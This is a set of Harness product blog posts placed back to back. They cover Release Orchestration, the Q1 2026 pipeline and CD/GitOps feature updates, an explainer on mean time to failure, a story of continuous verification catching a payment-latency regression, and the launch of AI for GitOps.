Not every release fits a scheduled release. Customer-specific deployments, unscheduled maintenance, and process testing need one-off releases. Ad hoc releases let you create and execute releases on demand-select a process, configure timing, provide inputs, and optionally run immediately. Test new processes in isolation, handle customer deployments without disrupting your calendar, or orchestrate emergency maintenance with full tracking and audit capabilities.
Modern releases deploy multiple services across multiple environments. Release Orchestration's input system handles this through variable mapping—define global variables like releaseVersion and `targetEnvironment` once, and they flow automatically to all activities. Deploy to QA with "QA Inputs," production with "Production Inputs"—same process, different configurations. This eliminates repetitive data entry, ensures consistency, and scales from three services to thirty without growing complexity.
Release Orchestration integrates with Harness's centralized notification framework, delivering alerts when releases start, pause for input, complete, or fail. Route notifications to Slack, email, PagerDuty, Microsoft Teams, or webhooks. Platform teams managing multiple releases shift from reactive monitoring to proactive awareness—get notified immediately when action is required.
Compliance reviews and post-mortems require detailed records. Release Orchestration provides downloadable Excel reports with complete execution history—every activity, status, timestamps, approvals, and inputs used. Generate reports for individual releases (sprint retrospectives) or release groups (quarterly audits). Activity-level detail meets compliance needs; process-level overviews serve executive summaries. All execution data is captured in the audit trail, allowing you to reconstruct exactly what happened during any release.
As releases scale, filters help you focus. Filter by source (ad hoc vs recurring), status (in progress, completed, failed), time window (this sprint, Q1 2026), environment (production, staging), or scope (specific orgs/projects). Platform teams filter to ad hoc releases for one-off deployments. Release managers filter by status for in-progress releases. Compliance teams filter by date range for audit periods. Transform an overwhelming calendar into a focused view of exactly what you need.
Production incidents don't wait for your release cadence. Release Orchestration supports hotfix workflows that fast-track emergency releases while maintaining governance. Mark releases as hotfixes to distinguish them in calendars and reports. The system detects execution conflicts—if a hotfix targets an environment where a release is running, you get visibility to coordinate decisions. Hotfixes use the same process structure, ensuring that approvals and audit trails are maintained. The hotfix designation flows through reports and logs, documenting emergency procedures for post-incident reviews. Speed meets governance.
Not everything can be automated. Security reviews, architectural approvals, and stakeholder sign-offs require human judgment. Release Orchestration treats manual activities as first-class citizens with the same visibility and dependency support as automated activities. Manual activities pause execution until someone provides input—an approval, verification, or checklist confirmation. Notifications alert the responsible person; they review the context and complete the activity, optionally leaving notes. Manual activities can depend on automated activities (approval after deployment) or vice versa (deployment after approval). All completions appear in audit trails and reports for compliance documentation.
Release Orchestration provides primitives—processes, phases, activities, dependencies, inputs—that compose to match how your organization ships software. Model microservice releases with parallel deployments and end-to-end tracking. Define compliance-driven releases with approval gates at critical checkpoints. Create streamlined hotfix workflows for emergencies. Coordinate feature flag enablement with deployments. Assign phase owners for multi-team coordination with notification-driven handoffs. The system scales from simple three-phase releases to complex workflows with fifty activities and nested subprocesses.
Harness AI transforms natural language descriptions into structured processes. Describe your workflow—"Create a multi-service release with phases for build, testing, deployment, and monitoring. Assign owners for Development, QA, and DevOps,"—and AI generates the complete structure with phases, activities, and dependencies. Refine the generated process by adding activities, adjusting dependencies, and configuring inputs. This reduces process modeling time from hours to minutes, making it practical to create specialized processes for different release types.
Release Orchestration provides real-time tracking at three levels: activity (running, succeeded, failed, waiting), phase (overall progress), and process (end-to-end status). The execution graph shows phases as nodes, dependencies as arrows, and color-coded status on each activity. Drill into pipeline executions from the release view with one click. See approval history for manual activities—who approved, when, and with what notes. This unified view eliminates the need to check multiple systems. Platform teams can see at a glance which releases are progressing smoothly, which are awaiting approval, and which need attention. [Learn more →](https://developer.harness.io/docs/release-orchestration/execution/activity-execution-flow)
Release Orchestration is available now in Harness. Contact Harness Support to enable the module for your account. Once enabled, explore Processes (model release blueprints), Release Calendar (schedule and track releases), Activity Store (reusable activities), and Input Store (configuration sets). The getting started guide walks you through creating your first AI-powered process, adding activities, and executing a release.
We're actively developing additional capabilities: deeper analytics and insights (release velocity metrics, phase duration trends, failure pattern analysis), advanced dependency modeling (cross-release dependencies, environment-level locking), enhanced collaboration (in-line comments, Slack-native monitoring), a template marketplace for common release patterns, and API/GitOps for managing processes as code. The roadmap prioritizes capabilities that help teams ship faster with greater confidence.
Software delivery has evolved far beyond single-service deployments, but release management tooling hasn't kept pace. Spreadsheets, email coordination, and manual checklists don't scale to modern microservice architectures, multi-team workflows, and compliance requirements. Release Orchestration provides the unified framework enterprise teams need to model, automate, and track complex releases across teams, tools, and environments.
Define reusable processes. Execute them with different inputs. Track activity-level progress. Enforce approvals and capture sign-offs. Maintain complete audit trails. All in one place, integrated with the pipelines and deployment workflows you already use.
Ready to see it in action? Explore the Release Orchestration documentation or reach out to your Harness account team to discuss how Release Orchestration can transform your release workflows.
The future of release management isn't about doing the same manual coordination faster—it's about orchestrating releases as structured, repeatable, auditable processes. That future is available today.


Welcome to our Q1 2026 Pipeline update! This quarter brings eight major enhancements that make pipeline development faster, validation easier, and governance stronger. From Git tags for immutable pipeline versions to AI-assisted policy authoring, these capabilities address the most common friction points teams encounter when scaling pipeline automation across their organizations. This update complements our Continuous Delivery & GitOps update released today, which covers expansions to the deployment platform and AI-powered verification.
Pipeline development workflows gain significant GitX improvements this quarter, bringing immutable versioning, flexible testing, and pre-commit validation directly into your Git-based workflows.
Pipelines stored in Git can now be triggered and executed from Git tags, not just branches. This unlocks release workflows where pipeline versions align with semantic versioning tags in your repository—when you tag a release as `v2.1.0` in Git, run that exact pipeline version via the UI or API. Tags provide immutable references to specific pipeline states, making it easy to replay historical pipeline configurations for compliance audits, debugging, or managing multiple product versions in parallel.
Learn more about Git tags for pipelines →
Pipeline chaining now supports branch selection for child pipelines, not just the default master branch. When configuring a Pipeline stage, specify which branch of the child pipeline to execute, enabling proper testing of parent-child pipeline integrations before merging to production. This is crucial when output variables from the child pipeline are only available in a feature branch, or when you're testing coordinated changes across multiple chained pipelines.
Learn more about pipeline chaining →
A new validation API lets you check pipeline YAML before committing changes to your repository. The API validates YAML syntax, schema conformance, entity references (Services, Environments, Connectors, Templates), RBAC permissions, OPA policy compliance, and expression syntax—all without actually running the pipeline or updating it in Harness. This closes a critical gap in GitOps workflows: changes made directly in GitHub bypass Harness validation, enabling teams to validate bulk updates in feature branches before merging and to catch configuration errors early.
Directed Acyclic Graph (DAG) execution support moves to Phase 2 with full UI integration. Define complex step dependencies in which multiple steps can run in parallel but must complete before downstream steps begin, within a single stage. DAG support enables sophisticated deployment patterns, such as parallel infrastructure provisioning followed by application deployment, or concurrent test suite execution with a final aggregation step. The visual graph makes it easy to understand execution flow and identify bottlenecks, while the declarative YAML representation keeps configuration simple.
Pipeline observability and notification capabilities expand to give platform teams better visibility into queue states and more granular control over failure alerting.
A new Account Settings page surfaces all queued pipelines across your entire account, showing queue position, org/project filters, and estimated execution order. The queue view includes bulk abort capabilities for queued pipelines and is available to Account Admins. For teams using pipeline queues to manage deployment locks or shared resource access, this visibility eliminates the mystery of why a pipeline is waiting and how long it's likely to remain queued.
Learn more about pipeline queuing →
Centralized notifications now support step-specific failure triggers, not just stage-level or pipeline-level failures. Configure notifications to fire only when a particular critical step fails—like a production deployment step or a compliance validation check—reducing alert noise and ensuring teams get notified about failures that actually matter. This granular control means you can route different failure types to different teams or channels: a failed security scan notifies the security team, while a failed deployment step notifies the on-call engineer.
Learn more about pipeline notifications →
OPA policy capabilities receive significant AI-powered enhancements and full GitX integration, making governance more accessible and easier to scale across organizations.
An AI assistant helps write OPA policies, reducing the expertise barrier for policy creation. Describe your governance requirements in natural language, and the assistant generates the corresponding Rego policy with explanations of how it works. This democratizes policy authoring beyond Rego experts, enabling security teams, compliance officers, and platform engineers to codify governance requirements without deep OPA expertise.
Learn more about OPA AI Assistant →
OPA policies now support the full GitX experience, including branch switching, bidirectional sync, and package name management. Policies can be developed and tested in feature branches before rolling out to production, with PR workflows providing change review and approval. This brings the same infrastructure-as-code benefits you have for pipelines and templates to your governance layer, enabling version control, change tracking, and collaborative policy development.
Learn more about OPA GitX integration →
New APIs support evaluation by both policy set IDs and entity-type/action pairs, giving teams greater flexibility in structuring and applying policies across their organizations. This enables more sophisticated policy architectures in which different evaluation strategies can be applied to distinct workflows or organizational structures.
Learn more about OPA policies →
The features highlighted in this update are available now in Harness Platform. Ready to see them in action? We've created a comprehensive video playlist that walks through these capabilities, featuring live demos and configuration guides.
Watch the Q1 2026 Pipeline Feature Playlist →
From Git-based pipeline versioning to AI-assisted policy authoring, this quarter delivers capabilities that streamline development workflows, improve validation practices, and strengthen governance controls. Whether you're managing dozens or thousands of pipelines, these enhancements reduce configuration overhead and align with how modern platform engineering teams scale automation across their organizations.
Be sure to also check out our companion post covering [Continuous Delivery & GitOps innovations](#)—including AI-powered verification, Azure Container Apps support, Windows deployment enhancements, and more.
Explore the documentation links throughout this post to dive deeper into each feature, or reach out to your Harness account team to discuss how these capabilities can accelerate your pipeline development and governance workflows.
What's coming next? Q2 2026 will bring advanced pipeline debugging capabilities, expanded expression engine functionality, and continued investment in GitX experience improvements. Stay tuned for more updates - we're just getting started.


Welcome back to the quarterly update series! If you've been following along, you've seen how Q3 2025 brought [deeper control and strengthened integrations], while Q4 2025 [closed the year strong] with platform upgrades and quality-of-life improvements. The first quarter of 2026 builds on these foundations with AI-powered continuous verification that eliminates configuration overhead, expanded deployment platform support, and GitOps workflow enhancements that align with how teams actually ship software.
Native support for Azure Container Apps brings serverless container orchestration to your Azure workloads with the full Harness deployment experience. Azure Container Apps provides a fully managed platform for running microservices and containerized applications with automatic scaling based on HTTP traffic or events, and now you can deploy to it with the same confidence and control you have for Kubernetes, ECS, and other platforms.
Harness gives you two deployment strategies designed for Azure Container Apps' architecture. Choose Basic deployments for immediate traffic cutover when you need speed, or leverage Canary deployments with progressive traffic shifting (20% → 70% → 100%) using Azure Container Apps' built-in revision management to validate new versions under real production load. The platform includes an automated rollback that captures container app state before deployment, enabling instant recovery if issues arise. Authentication is flexible—support for both Azure OIDC (keyless authentication) and Service Principal methods means you can deploy across subscriptions using a single connector, with full support for Azure Container Registry (ACR) and Docker Hub as artifact sources.
Learn more about Azure Container Apps deployments →
This year, we're focusing heavily on Windows deployments to address the performance and scalability challenges that enterprise Windows teams face every day. The two enhancements shipping this quarter are just the beginning—we're bringing the same innovation velocity to Windows deployments that you've come to expect across all Harness platforms. Stay tuned for more Windows Deployment capabilities throughout 2026 that will continue to streamline your deployment processes and eliminate friction in enterprise Windows environments.
Learn more about Windows deployments →
Windows Session Reuse eliminates redundant connection overhead by enabling delegate-wide session pooling, cutting connection setup time from 30-60 seconds to instant reuse in JEA environments. When a command step executes, Harness checks the pool for an existing idle session to the target host with matching credentials and reuses it immediately, dramatically reducing pipeline execution time for workflows with multiple command steps.
Learn more about Windows Session Reuse →
Multi-Host Deployment with Dynamic Targeting extends Windows Deployment credential setup to dynamically target different hosts, enabling true parallel execution across multiple Windows servers. Configure multiple host groups within a single credential configuration, and Harness automatically routes commands to the appropriate servers based on your deployment strategy. This unlocks centralized credential management while maintaining the security boundaries required in JEA environments, enabling teams managing large Windows server fleets to deploy faster with reduced credential sprawl.
Learn more about Multi-Host Windows Deployments →
Amazon ECS deployments get two powerful new capabilities that bring operational flexibility and automation to your container workloads.
Standalone ECS Scaling lets you scale services up or down without triggering a full deployment, enabling operators to respond to real-time demand without triggering change management processes. The new ECS Scale step lets you modify desired task counts on demand—whether you're responding to traffic spikes, performing maintenance windows, or testing capacity limits—without redeploying your application.
Learn more about ECS scaling →
ECS Scheduled Actions enable time-based scaling policies directly within your ECS service deployments, eliminating the need to manage scheduled actions separately in the AWS console while keeping your entire ECS configuration under version control. Define scheduled actions to automatically adjust desired task counts at specific times—scale up services before anticipated morning traffic, scale down during off-peak hours, or align capacity with predictable business patterns.
Learn more about ECS scheduled actions →
Terraform deployments now include automatic security protections that prevent accidental exposure of sensitive data throughout your pipeline workflows.
Terraform outputs marked as `sensitive = true` are now automatically masked in the Harness UI, preventing accidental exposure of credentials, API keys, and other secrets in pipeline execution logs and output tabs. When Terraform outputs are marked as sensitive, Harness respects that designation and redacts the values wherever they appear—you can still reference these outputs in downstream steps using expressions, but the actual values remain encrypted and hidden from view.
Learn more about masking sensitive outputs →
This quarter's focus on continuous verification centers on eliminating configuration overhead through AI automation and expanding observability platform integrations. From zero-config deployment health analysis to Git-based configuration management, these capabilities make verification accessible to more teams while reducing the time to production-ready monitoring.
Alongside AI Verify, AI-assisted health source configuration makes traditional verification setup effortless through a guided workflow that discovers available signals from your observability platform, classifies them by deployment impact, and generates verification-ready configurations. Describe your service and monitoring goals in natural language, and the Configuration Agent automatically discovers relevant metrics, organizes them into intelligent categories, and generates the queries and thresholds for you—with human checkpoints for selection and refinement at every stage.
Fine-tune configurations with simple natural language inputs or create custom composite metrics on the fly. What used to take hours now takes minutes.
AI Verify eliminates the manual setup complexity that has traditionally slowed the adoption of continuous verification. No more baseline configuration, threshold tuning, or monitored service management. AI Verify deploys lightweight data-collection plugins into your Kubernetes cluster that collect, aggregate, and provide observability data while stripping personally identifiable information before it leaves your environment.
The plugins gather logs and metrics from your observability platforms and perform statistical and algorithmic anomaly detection. Large language models then contextualize these anomalies against your deployment verification criteria, filter false positives based on business-criticality, and synthesize natural-language root-cause insights with actionable remediation suggestions—all without requiring explicit baseline data. This shifts continuous verification from weeks of configuration work to immediate, intelligent monitoring that understands your services from day one.
Learn more about AI-powered verification →
Harness Continuous Verification now supports Dynatrace Query Language (DQL) for querying timeseries metrics from Dynatrace Grail, their next-generation data lakehouse. Craft sophisticated metric analysis using aggregation functions, enable dimension-based data splitting for per-instance continuous verification, and combine multiple data sources in a single query. This extends beyond the traditional Full Stack Observability model, giving you direct access to custom metric queries rather than relying solely on predefined metric packs.
Learn more about Dynatrace DQL support →
GitOps workflows gain AI-powered intelligence, unified notifications, and enhanced PR capabilities this quarter. These improvements streamline application management, improve operational visibility, and align GitOps workflows with how teams naturally collaborate through pull requests.
AI-powered operations management brings natural language queries and intelligent automation to GitOps applications, AppSets, and clusters. Ask questions like "What applications are out of sync?" or "Which syncs failed in the past 24 hours?" and get instant answers drawn from your entire GitOps deployment landscape. The AI agent can also trigger operations—such as syncing all applications managing non-prod services with a single command or generating pipeline snippets for common GitOps workflows. This transforms dashboards and manual queries into conversational operations management, making GitOps accessible to platform teams, developers, and operators alike.
[Learn more about AI-powered GitOps →]
GitOps applications now integrate with Harness's centralized notification framework, bringing the same notification capabilities available for pipelines to your GitOps workflows. Track application sync events—start, complete, success, and failure—alongside ApplicationSet creation, sync, and error events through Slack, email, PagerDuty, Microsoft Teams, or any webhook-compatible system. Configure notification rules at the account, organization, or project level using the same interface you already use for pipeline notifications.
Learn more about GitOps notifications →
GitOps PR-based workflows get two key improvements. The Update Release Repo step can now block until the raised PR is merged, eliminating the need for separate Merge PR steps and manual approval stage coordination—the step creates the PR, waits for review, and proceeds once merged. Squash and Merge Support brings native squash-and-merge strategies to the Merge PR step, working with GitHub App tokens and following your repository's configured merge strategies to maintain a clean, linear repository history.
[Learn more about PR pipelines →]
The features highlighted in this update are available now in Harness CD and GitOps. Ready to see them in action? We've created a comprehensive video playlist that walks through these capabilities, featuring live demos and configuration guides.
Watch the Q1 2026 Feature Playlist →
From AI-powered verification that understands your deployments from day one to Windows performance breakthroughs and GitOps workflow enhancements, this quarter delivers capabilities that eliminate configuration overhead, expand platform coverage, and align with how modern teams ship software.
Explore the documentation links throughout this post to dive deeper into each feature, or reach out to your Harness account team to discuss how these capabilities can accelerate your delivery workflows.
What's coming next? Q2 2026 will bring deeper integrations with cloud-native platforms, expanded AI capabilities across the deployment lifecycle, and continued investment in developer experience improvements. Stay tuned for more updates—we're just getting started.
_%20Formula%2C%20Examples%20%26%20DevOps%20Use%20Cases.png)
_%20Formula%2C%20Examples%20%26%20DevOps%20Use%20Cases.png)
Your production problems aren't just random. If a Kubernetes node fails every 72 hours or your CI runners crash every 4 builds, that's a clear pattern. Mean Time to Failure (MTTF) turns these failures into data that you can control, plan for, and improve over time.
MTTF should not be a decoration on a dashboard for platform engineering leaders; it should be a decision-making tool. With the right calculations, you can set realistic SLOs, plan capacity, and cut down on developer work by focusing on the parts that break the most often. You'll get exact formulas for distributed systems, data collection patterns that avoid common mistakes, and a playbook to turn reliability improvements into measurable ROI through automated resilience practices alongside faster recovery metrics.
Stop letting unpredictable failures drain your team's time and budget. With Harness Continuous Integration and Continuous Delivery, you can turn MTTF insights into concrete pipeline changes, progressive delivery strategies, and guardrails that keep reliability improving release after release.
Mean Time to Failure (MTTF) is the average operating time of non-repairable components before failure across a population.
At a basic level:
MTTF = total operating time ÷ number of failures
If 100 CI runners each run for 50 hours during a week (5,000 runner‑hours total) and 20 runners experience at least one hard failure, then:
MTTF = 5,000 ÷ 20 = 250 hours
Historically, MTTF is used for physical assets you replace instead of fix (light bulbs, disks, sealed devices). In software, the same concept fits ephemeral resources such as:
MTTF tells you how long things run, on average, before they fail and must be replaced. MTTF is an approximation, not a strict reliability model.
Three reliability metrics show up in every platform review:
Use them to answer different questions:
For example:
Your platform scorecards should display all three together, alongside SLO health and error budget burn, so teams see the full reliability picture instead of optimizing a single metric in isolation.
The theoretical rules around MTTF and MTBF are straightforward; the ambiguity comes when you apply them to real cloud‑native stacks. Concrete examples help.
These components typically behave like non‑repairable items:
For each of these, you can treat a single lifecycle (from start to failure/termination) as one observation in your MTTF dataset.
These components behave more like classic repairable systems:
For these, you care more about how much uptime you get between failures (MTBF) and how quickly you can restore full health (MTTR).
It is tempting to say “our nodes have an MTTF of 720 hours, so our service is very reliable.” That is only true if your architecture masks those failures from users. User‑facing reliability lives at the service boundary, measured via SLOs and error budgets; component MTTF is an input that helps you:
MTTF helps you understand where things break; SLOs and MTTR tell you how much that matters to customers.
The MTTF calculation is trivial. The work is in collecting honest data across a distributed system without losing important details.
For each component type, decide exactly what counts as “failed,” for example:
Document these in your platform taxonomy so every team logs and reports failures the same way.
For each instance in the population you’re measuring, capture:
Then compute:
MTTF = total operating time across all instances ÷ number of failed instances
This gives you MTTF for that class (e.g., “Linux GPU runners in prod”).
Never pool dissimilar components into a single MTTF number. Instead:
Example:
Fleet MTTF (weighted) = (1,000 + 100) ÷ (5 + 1) ≈ 183 hours, not the naive (200 + 100) ÷ 2.
Some instances will still be running when you take the snapshot. If you drop them:
When censored samples are common, use basic survival analysis (like Kaplan–Meier) so that "still running" instances add to the exposure instead of being thrown away. If you give them clear timestamps and labels, observability tools and data teams can usually take care of this for you.
MTTF becomes strategically important when you use it to shape SLOs, error budgets, and reliability investments, not just track uptime.
If a class of components has an MTTF of 72 hours, a single instance will fail about:
8,760 hours/year ÷ 72 ≈ 121 failures/year
With multiple instances and redundancy, not every failure becomes a user‑visible incident, but you can still estimate:
MTTF highlights which components generate excessive manual work:
Use this to:
Because MTTF underpins incident rates, any improvement can be tied to measurable gains:
Treat MTTF as a leading indicator: when you raise it on critical components, you should see downstream improvements in SLO attainment and delivery cadence.
Once you know which components have the lowest MTTF and the highest operational cost, you can systematically improve them. In modern delivery pipelines, four patterns tend to pay off quickly.
Flaky CI is one of the most common sources of low MTTF and wasted engineering time.
You can improve CI‑related MTTF by:
Result: higher MTTF for pipelines and runners, fewer broken builds, and fewer interruptions for developers.
You cannot prevent every bad change, but you can limit how many become full‑blown incidents that count against your service‑level MTTF.
Key tactics:
This keeps effective MTTF for user‑facing services higher, even if underlying components still fail regularly.
Many MTTF regressions start as “just one more config change” that slips past informal reviews. Prevent those with:
This ensures the MTTF gains you’ve earned are not eroded by ad‑hoc changes and one‑off exceptions.
To sustainably raise MTTF, you need confidence that your architecture and runbooks can handle real failures, not just happy‑path tests.
By running targeted chaos experiments on the components with the lowest MTTF, you can:
When failures happen, MTTF tells you how often they occur. AI‑powered automation helps you decide what to do next—fast—so more failures stay under control and never become major incidents.
Harness AI‑assisted deployment verification analyzes metrics and logs during and after each deployment:
The result is fewer deployments turning into user‑visible failures and a higher effective MTTF for your services, because many problematic changes are automatically rolled back before customers notice.
On the CI side, AI‑driven analysis works with Test Intelligence and analytics to:
SLOs and error budgets turn raw data into rules. Instead of making teams watch dashboards and make decisions on their own, you can:
This completes the cycle: MTTF informs SLO design. Guardrails are based on SLOs, and AI-powered verification and rollbacks work on those guardrails at machine speed.
Want to turn MTTF insights into automated reliability improvements?
Explore Harness CI/CD to reduce failure rates, enforce guardrails, and improve SLO performance.
MTTF can feel abstract until you have to justify reliability decisions or explain incident patterns to stakeholders. These FAQs break down the most common questions practitioners ask about MTTF and how it relates to other reliability metrics.
MTTF is the average time it takes for a group of parts, like pods or temporary CI runners, to fail in a way that can't be fixed. MTBF tells you how long systems you fix and put back into service, like databases or long-running services, are up and running before they break down again.
When you need to know how often failures happen so you can plan for redundancy or auto-healing, use MTTF. Use MTTR to find out how quickly you can fix services that users can see after they go down. Both metrics work together and are usually used to help make decisions about SLOs and error budgets.
MTTF estimates are very uncertain when there aren't many failures. To make the number more reliable, put similar workloads together, add up the exposure hours for each class, and think of MTTF as a range or trend instead of a single point. If a part didn't fail in your window, don't assume that it will never fail; instead, treat that as incomplete data.
Most of the time, MTTF is skewed by dropping instances that are still running when the measurement is taken (right-censoring), combining environments (staging, load, and production) into one metric, and having different or unclear definitions of failure across teams. Fixing these problems usually makes MTTF more useful than any other advanced statistical method.
MTTF doesn't work when failures are very similar or when you're measuring systems that are fixed instead of replaced. In those cases, MTBF and MTTR, when looked at through SLOs and error budgets, usually give better advice than just one MTTF value.
When the MTTF is higher on important parts, there are fewer problems, fewer pages, and less time lost by developers fixing them. You can link improvements directly to faster safe release velocity, lower downtime risk, and lower operational costs when you combine MTTF with SLOs, error budgets, chaos engineering, and AI-powered automation.


Modern engineering teams have become exceptionally good at shipping software quickly.
With modern CI/CD platforms, what once required careful coordination, late-night release windows, and layers of approvals now happens almost invisibly. Pipelines execute in minutes. Releases flow continuously. The friction that once slowed everything down has been engineered away.
From the outside, it looks like progress in its purest form. Automation removed bottlenecks. Cloud infrastructure removed limits. Pipelines removed human delay. But beneath that acceleration, there is a quieter reality that only reveals itself at the worst possible moment.
Speed does not guarantee safety. And more importantly, speed does not guarantee confidence. Most teams today can answer one question with absolute certainty:
Did the deployment succeed?
Green pipeline. All checks passed. No errors.
But when you ask slightly different questions, the answers become far less certain:
Did the deployment actually make the system better? And more importantly - did it improve customer experience, accelerate transactions, and drive business outcomes, or did it quietly degrade performance and impact revenue?
That difference may sound subtle, but in practice, it is where reliability either exists - or quietly breaks. This gap between deployment success and validated system behavior is exactly where continuous verification becomes critical.
And nowhere has this been more evident than in a financial services transformation I witnessed firsthand, where a perfectly “successful” deployment slowly degraded a live payment system without anyone noticing.
A large global bank was deep into modernizing its digital payment platform. They were not experimenting. They were executing at scale. Their architecture was exactly what you would expect from a mature engineering organization. Kubernetes-based microservices, fully automated CD pipelines, Infrastructure defined as code and testing embedded across every stage. Over time, they had achieved something remarkable. Deployments had become routine. What once required weekend coordination and careful planning was now happening several times a day, almost without discussion. Releases were no longer events. They were background activities.
Their typical deployment pipeline looked something like this:
Build → Security scan → Integration tests → Deploy → Smoke tests
.png)

Build flowing into security scanning, into integration testing, then deployment, followed by smoke tests. It was elegant. Automated. The kind of pipeline you would proudly present at a conference. And for a while, it worked perfectly. Until one Friday afternoon…
A new version of the transaction validation service was deployed.
The release pipeline executed flawlessly.
Every step reported success.
The pipeline marked the deployment as successful. The release moved forward. Engineers moved on to other tasks. But about twenty minutes later, something subtle began to happen. Payment processing latency began creeping upward. At first it was small.
Then the following symptoms appeared:
Nothing catastrophic happened. The system did not crash. Pods did not fail. Containers did not restart. From the perspective of Kubernetes, everything looked healthy.
But the platform was slowly degrading. Revenue and customer experience were definitely impacted. Because the pipeline had already declared success, there was no mechanism to reconsider that decision. No feedback loop connecting real system behavior back into the deployment outcome.
The problem remained undetected for nearly half an hour. By the time engineers realized what was happening, the impact had already spread. Thousands of delayed transactions. Customer complaints increasing. Engineering teams pulled into urgent investigation.
The cause, when eventually identified, was deceptively simple. A small change in a database query. Slightly inefficient. Invisible under test conditions. But under real production load, it introduced just enough latency to ripple across the system.
Unit tests did not catch it. Integration tests did not catch it. Kubernetes health checks did not catch it. But the signals were there, visible in the observability platform. They simply were not part of the deployment decision.
What makes this story compelling is not that it happened. It is that it keeps happening. Over the past six months, across multiple enterprise environments, I have seen the same pattern emerge with striking consistency.
Different companies. Different industries. Different teams.
The same blind spot.
Every organization had invested heavily in observability. Their platforms were powered by tools like Datadog, Dynatrace, New Relic, AppDynamics, and Grafana.
Their systems were instrumented in depth. Metrics, logs, traces, business indicators - everything was being captured. Their dashboards were rich. Their visibility was impressive.
They could see everything. But only after the fact.
Because when I examined how deployments were validated, the story changed completely.
Pipelines relied almost exclusively on Kubernetes readiness and liveness checks, sometimes complemented by simple smoke tests. If the service started and responded, the deployment was considered successful. And that was the end of the decision process. Observability existed - but outside the pipeline.
It was a tool for humans to investigate problems, not a mechanism for the system to prevent them. In every case, the realization was the same. They had built world-class observability capabilities. But none of it was being used to decide whether a deployment should proceed.
Kubernetes health checks are essential. They are incredibly effective at keeping systems running and enabling self-healing behavior. But they were never designed to answer the question that matters most during a deployment.
They tell you whether something is alive. They tell you whether it can receive traffic. They do not tell you whether it is behaving correctly. And that distinction is where modern incidents live.
A system can be fully operational from Kubernetes’ perspective while simultaneously degrading the experience for every user interacting with it.
I have seen systems where database latency doubles without any restart. Where memory usage slowly increases over hours. Where microservices begin retrying requests in subtle feedback loops. Where queues build silently until they become bottlenecks.
All of it happening while every pod remains in a perfectly “ready” state. Kubernetes reports success. Users experience degradation. The pipeline sees green. Reality is different. This is the illusion of a successful deployment.
Continuous verification changes the nature of the question. Instead of asking whether the deployment completed, it asks whether the system is behaving as expected.
It takes the signals already present in your preferred Observability platforms and brings them directly into the pipeline itself. Now the pipeline is no longer blind. It observes latency. Error rates. Throughput. Infrastructure signals. Even business-level indicators. It compares the behavior of the new version against a known baseline. And most importantly, it acts.
If the system begins to drift away from expected behavior, even subtly, the pipeline can stop the rollout and revert to a known good state automatically. No delay. No escalation. No manual intervention.
After the incident, the platform team redesigned their approach. They integrated continuous verification using Harness with telemetry from their loved Observability tool.
Their new pipeline looked like this:
Build → Security Scan → Integration tests → Canary deployment → Continuous verification → Promote or rollback
.png)

During the canary phase, only a small percentage of traffic was routed to the new version.
The verification step analyzed key signals including:
The system compared two sets of signals:
Baseline behavior (previous version)
versus
Canary behavior (new version)
If the canary version performed worse than the baseline, the system immediately rejected the release.
Two weeks later, another release was pushed. This time, the sequence unfolded differently. The canary deployment began. Traffic started flowing. Observability data was analyzed in real time. Within minutes, a deviation appeared. Not dramatic. Not catastrophic. But enough.
Latency began to drift beyond acceptable thresholds. This time, the pipeline saw it. And without hesitation, it rolled back. No incident. No escalation. No customer impact. Just a silent correction, executed automatically. The kind of outcome most users will never notice - but that defines operational excellence.
Traditional pipelines answer a binary question.
Did the code deploy?
Continuous verification answers the questions that actually matter.
Did the system behave correctly after deployment? Did it improve customer experience?
In modern systems - distributed, dynamic, deeply interconnected - failures rarely present themselves as crashes. They appear as degradation. And if your pipeline cannot detect degradation, it is only solving half the problem. Continuous verification transforms observability into an automated safety gate for releases.It closes the loop.
After implementing continuous verification, the platform team observed significant improvements. But the most important improvement was not technical. It was cultural. Engineers regained the confidence to deploy frequently without fear of hidden regressions.
Modern DevSecOps practices have matured significantly. We validate security. We enforce compliance. We ensure code quality. But we still tend to stop validation at the moment of deployment. Continuous verification extends that validation into real system behavior. It transforms the pipeline into a closed loop. Not just build, test, deploy. But build, test, deploy, verify. And that final step is where trust is established.
The most advanced engineering organizations are already evolving toward a new model. Deployment decisions are no longer based solely on pre-release validation. They are informed by live system behavior.
Observability is no longer a dashboard. It becomes part of the control system.
Platforms like Harness, integrated with your Observability tools, are enabling this shift. And once teams adopt this model, the difference is profound.
Continuous delivery solved the problem of speed. Continuous verification solves the problem of confidence.
If your pipeline stops when deployment succeeds, you are still operating with incomplete information. Because in modern software delivery, success is not defined by whether something was deployed. It is defined by whether that deployment made the system better.
And the only reliable way to answer that - automatically, consistently, and at scale - is through continuous verification. Start treating observability as a release gate - not just a dashboard!


Innovation is moving faster than ever, but software delivery has become the ultimate chokepoint. While AI coding assistants have flooded our repositories with an unprecedented volume of code, the teams responsible for actually delivering that code, our Platform and DevOps engineers, are often left drowning in manual toil.
If you’re managing Argo CD at an enterprise scale, you’re painfully familiar with the "Day 2" reality. It can become tab fatigue as a service: jumping between dozens of instances, chasing out-of-sync applications, and manually diffing YAML just to figure out where your configuration drifted.
Today, we are thrilled to introduce AI for Harness GitOps. It’s an agentic intelligence layer designed to help you manage, monitor, and troubleshoot your entire GitOps estate through simple, natural language.
Standard GitOps tools are excellent at syncing state, but they often lack the high-level orchestration required by complex enterprises. When an application goes out of sync, you shouldn't have to click through multiple tabs and clusters just to find out why.
With AI for GitOps, Harness brings a new level of context-aware, agentic intelligence to your delivery lifecycle:
We built this because scaling GitOps shouldn't mean scaling your headcount. Our mission is to provide an Enterprise Control Plane that enhances your existing Argo investment rather than replacing it.
Platform engineering teams are often overwhelmed and understaffed. By moving from manual root cause analysis to automated reasoning and active configuration management, we free up engineers to focus on innovation rather than repetitive maintenance tasks.
By leveraging the Harness Software Delivery Knowledge Graph, our AI understands your unique workflows, policies, and ecosystem. It doesn't just show you an error; it explains it in the context of your specific environment and can proactively suggest (or execute) the configuration changes needed to resolve the issue. The goal here is to move the needle on Mean Time to Recovery (MTTR) from hours to minutes.
Here’s the thing: speed without safety is just a faster way to break things, and work more nights and weekends fixing them. Harness ensures that enterprise-grade governance is built in, not bolted on. Every AI-driven action, including configuration updates and pipeline modifications, is governed by your existing RBAC and OPA (Open Policy Agent) policies, providing an immutable audit trail for every change.
The promise of AI for developers has been held back by the limitations of the deployment pipeline. Harness AI for GitOps bridges that gap, providing a "prompt-to-production" workflow that is finally as fast as the code being written.
Simply put, it's time to stop syncing and start orchestrating. Experience the future of intelligent delivery with Harness.
Want to see it live? Get a demo.


Modern CI/CD platforms allow engineering teams to ship software faster than ever before.
